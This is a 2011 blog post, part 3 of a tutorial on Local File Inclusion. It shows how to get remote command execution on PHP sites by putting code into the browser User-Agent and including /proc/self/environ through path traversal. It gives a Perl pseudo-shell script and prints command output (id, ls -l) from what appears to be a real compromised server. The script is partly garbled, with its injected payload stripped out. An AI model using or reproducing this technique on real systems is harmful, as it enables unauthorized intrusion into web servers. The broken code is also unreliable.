Thursday, September 29, 2011

Local File Inclusion Tutorial Part 3 of 4

LFI Technique

When a request to a php page is made, apache forks (creating a new proccess) and exec' the php binary to actually run/interpret the php script. As in every *nix system each process that runs, has it's own /proc entry, it can be quite useful to us, since it holds a lot information about the process and the enviroment where it is running.

More specifically, the file /proc/self/environ of a php process running has something like this:
(X11; U; Linux i686; en-US; rv: Gecko/20061201 Firefox/ Gentoo�HTTP_KEEP_ALIVE=300�
That "Gentoo" is actually part of the userAgent of my browser. So guess what...
imagine that we change the userAgent of the browser to and make a request like:
you guessed right. it works Smile the php system is actually executed Smile

So, after coding this little perl script
#!/usr/bin/perl -w
use strict;
use LWP 5.64;
use LWP::UserAgent;

my $browser = LWP::UserAgent->new;
my $url = $ARGV[0];
my ($line,$response);
$url .= "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ";

print "jcfsprompt: ";
while( $line = ) {
$browser->agent("jcfs /dev/stdout");?>jcfs");
$response = $browser->get( $url );
if ($response->content =~ /jcfs(.*)jcfs/s) {
print $1;
print "jcfsprompt: ";
I tried something like this...

jcfs@heaven ~/boxes $ perl
jcfsprompt: id
uid=32004(fastfr00) gid=32005(fastfr00) groups=32005(fastfr00) context=system_u:system_r:initrc_t
jcfsprompt: uname -r
jcfsprompt: pwd
jcfsprompt: ls -l
total 2280
-rw-r--r-- 1 fastfr00 fastfr00 17116 Oct 24 2006 401.shtml
-rw-r--r-- 1 fastfr00 fastfr00 16941 Oct 24 2006 403.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17327 Oct 24 2006 404.shtml
-rw-r--r-- 1 fastfr00 fastfr00 17026 Mar 21 17:30 500.shtml
drwxr-xr-x 2 fastfr00 fastfr00 4096 Aug 24 2006 _private
drwxr-xr-x 4 fastfr00 fastfr00 4096 Aug 24 2006 _vti_bin


Certified Ethical Hacker Network Security Internet Security Computer Security Wireless Network Security